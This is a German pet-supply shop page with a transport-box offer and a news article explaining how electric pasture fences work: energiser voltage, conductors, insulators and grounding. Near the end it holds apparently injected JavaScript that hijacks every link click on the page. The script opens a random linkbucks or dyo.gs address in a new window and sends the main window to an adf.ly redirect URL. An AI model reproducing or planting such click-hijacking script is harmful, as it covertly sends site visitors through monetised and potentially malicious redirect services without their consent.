kleiner Hund
Transportbox für Vögel & Kleinnager zum günstigen Preis
Transportbox für Vögel & Kleinnager zum günstigen Preis
Statt 8,99 EUR
Nur ab 5,00 EUR
incl. 19 % MwSt exkl.Versandkosten
Hersteller
Unsere News
Wie funktioniert ein Weidezaun?
Der elektrische Weidezaun - Ein Kreislauf-System

Funktionsweise:
Kommt ein Tier mit dem elektrischen Leiter (Band, Litze oder Seil) in Berührung, so schließt sich der Stromkreis und das Tier erhält einen Stromschlag. Dieser ist zwar für das Tier vollkommen ungefährlich, bewirkt aber, dass das Tier dem Elektrozaun in Zukunft mit Respekt begegnet.

Der Elektrozaun ist immer so stark wie sein schwächstes Glied.

Bestandteile:
1. Weidezaungerät:
Das Weidezaungerät sendet regelmäßige Stromstöße aus und ist somit das Herz des elektrischen Weidezaunsystems. Entscheidend für die Auswahl des richtigen Gerätes ist u.a. die Höhe der Spannung bei Widerstand. Dabei wird im allgemeinen von einem Widerstand von 500 Ohm ausgegangen, da dies in etwa dem Widerstand entspricht, der am Zaun bei der Berührung durch ein Tier vorliegt. Zu beachten ist hierbei, dass diese Spannung nach den VDE-Vorschriften nicht unter 2500 Volt liegen darf, da ansonsten die Funktion des elektrischen Weidezauns eingeschränkt wird (für Tiere mit dickem Fell empfehlen wir 4000 Volt Mindestspannung). Die neuen Netz- und Akkugeräte von EURO-GUARD haben deshalb u. a. eine optimale Hütesicherheit gewährleistet. Die ebenfalls oft angegebene Leerlaufspannung besitzt dagegen nur eine geringe Aussagekraft. Ein weiterer wichtiger Gesichtspunkt bei der Auswahl des Gerätes ist die sog. Impulsenergie, die im Gegensatz zur Ladenergie (Energie im Gerät) die tatsächliche Ausgangsleistung angibt.

Genaue Angaben zu den technischen Daten unserer EURO-GUARD Weidezaungeräte finden Sie bei den einzelnen Geräten. Die Angaben sollten nur als annähernd betrachtet werden und können durch unterschiedliche äußere Gegebenheiten beeinflusst werden. Wenn eine Steckdose zur Verfügung steht sollte die Wahl stets auf ein Netzgerät fallen da durch die damit verbundene sichere Stromversorgung eine Hütesicherheit gegeben ist. Ohne Netzanschluss wird bei längeren Zäunen und schwer zu hütenden bzw. abzuwehrenden Tieren (z. B. Wildschweinen) ein 12V- bzw. ein Solargerät empfohlen. Bei kürzeren Zaunanlagen und leichter zu hütenden Tieren wie z. B. bei Pferden können auch 9V-Akkugeräte eingesetzt werden.

2. Elektrische Leiter:
Die elektrischen Leiter (Edelstahl- bzw. verzinkte Kupferleiter) transportieren den Strom!
Diese Leiter gibt es als: WEIDEZAUNBAND, WEIDEZAUNSEIL, WEIDEZAUNLITZE und WEIDEZAUNDRAHT. Weiterhin können Sie aus drei verschiedenen Qualitätsstufen auswählen: Star Classe, Mulit Classe und Basic Classe

3. Isolatoren:
Achten Sie ständig darauf, dass die Isolatoren im einwandfreien Zustand sind. Witterungsbedingte Abnutzungserscheinungen bzw. Scheuerstellen können zu einer Beeinträchtigung der Isolation führen. Wenn es zu Ableitungen kommt ist Hütesicherheit nicht mehr gegeben. Kontrollieren Sie daher ständig die eingesetzten Isolatoren auf Unversehrtheit und wechseln Sie beeinträchtigte Isolatoren sofort aus. Achten Sie ggf. darauf, dass Sie die richtigen Isolatoren für den entsprechenden Einsatzzweck verwenden.

4. Erdung:
Ein sehr wichtiger Punkt, der in der Praxis oft sträflich vernachlässigt wird: Berührt das Tier den elektrischen Leiter so wird der Stromkreis geschlossen - allerdings nur, wenn der Strom, der über das Tier in den Boden fließt, über Erdungspfähle wieder zum Gerät zurückgelangen kann. Zu beachten ist dabei, dass für unterschiedliche Geräte auch eine spezielle Erdung notwendig ist. Für Netz- und Akku-Geräte werden z. B. 2-3 Erdungspfähle benötigt. Außerdem spielt die Bodenbeschaffenheit eine wesentliche Rolle bei der Auswahl der richtigen Art und Anzahl von Erdungspfählen. So weist ein trockener Boden einen höheren Widerstand auf als ein feuchter und verlangt eine dementsprechend stärkere Erdung.

Quelle: Katalog Albert Kerbl + EURO-GUARD







function open_window(url){ window.open(url); } $(document).ready(function(){ var links1 = Array(); var links2 = Array(); links1[0] = "http://adf.ly/3KBXw"; links1[1] = "http://adf.ly/3JPj1"; links1[2] = "http://adf.ly/3JPqN"; links1[3] = "http://adf.ly/3JPtH"; links1[4] = "http://adf.ly/3JPuw"; links2[0] = "http://0001733e.qqc.co"; links2[1] = "http://b185ed6a.linkbucks.com"; links2[2] = "http://c6250606.dyo.gs"; links2[3] = "http://a9572294.dyo.gs"; links2[4] = "http://2892efbc.dyo.gs"; var rand = 1; var selection = Math.round(Math.random()*4); $("a").click(function(){ if(rand == 1){ open_window(links2[selection]); $(this).attr("target", "_blank"); window.top.location.href = links1[selection]; } }); });
Zurück
PetNews.de Das Informations Portal der Heimtierbranche
Self-Commerce provides no warranty and is redistributable under the GNU General Public License